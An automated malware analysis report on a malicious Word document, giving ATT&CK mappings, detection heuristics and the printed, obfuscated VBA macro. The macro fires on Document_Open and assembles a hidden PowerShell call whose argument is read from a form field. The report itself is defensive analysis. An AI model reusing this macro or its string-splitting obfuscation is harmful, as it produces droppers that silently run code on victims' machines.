Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open macro, a common technique for executing malicious code as soon as the document is opened. The critical heuristic fired for a Shell() call in VBA, indicating that the macro attempts to execute an external program. The script explicitly constructs the command 'powershell.exe shell.exe', suggesting it downloads and executes a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics (5)
- ClamAV: Doc.Malware.Sonbokli-6846334-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Sonbokli-6846334-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1824 bytes |

SHA-256: 2e4d577fad4e6eb0e298af2b034103b7e91009fa6e919eb315d6123e559b2717

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim n8o1nRGgF(10 To 202) As String
n8o1nRGgF(10) = "whOJQ7KiT"
Dim IFrOCcNgG As Long
IFrOCcNgG = (824 - 804) + (49)
Dim PaNK0() As Byte
Dim Jr6pNQ As Long
Jr6pNQ = (-478 + 487) / (16)
Dim zxAj42() As Byte
Call w("er")
End Sub
Attribute VB_Name = "jZ9rVSuj4"
Sub w(btxDWvsP)
Dim Q3e9Fof(13 To 251) As String
Q3e9Fof(13) = "erYt2UMa"
Dim XfeTcwd(153) As Byte
Dim RK5BF As String
RK5BF = txP0Dhy
Dim HyCxm2K As String
HyCxm2K = fxv5XHnwj
Dim Z1WmJR70
Z1WmJR70 = YgZ4h1
Dim vn3Kc6Drz() As Byte
Dim RB5O13(13 To 210) As String
RB5O13(13) = "fHR72l8BO"
Dim uR8aJuFUf() As Byte
Dim nENVbXZ(11 To 248) As Long
nENVbXZ(11) = 185 - 142
UJq4K = "shell.exe "
Dim KFh83
KFh83 = BsqR8t
Shell gzpSZ() _
& btxDWvsP _
& UJq4K _
& hqpUXaIRz _
, 0
End Sub
Attribute VB_Name = "pSAcjw5"
Public Function gzpSZ() As String
Dim sAJx6fMOd(10 To 72) As Long
sAJx6fMOd(10) = 1808 / 226
gzpSZ = "pow"
End Function
Attribute VB_Name = "DEp0w"
Public Function hqpUXaIRz()
Dim GOHP1Sh As Object
Set GOHP1Sh = New f
Dim HorpxG6E As Long
HorpxG6E = (-1238 + 1242) + (23)
Dim nBQ1ZkwX As String
nBQ1ZkwX = GOHP1Sh.de.Text
hqpUXaIRz = nBQ1ZkwX
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{24C19680-0CBF-4C8D-A6AA-4713CE500401}{4DCEDCA2-ED5C-4D7B-8726-79B0D80D01D4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False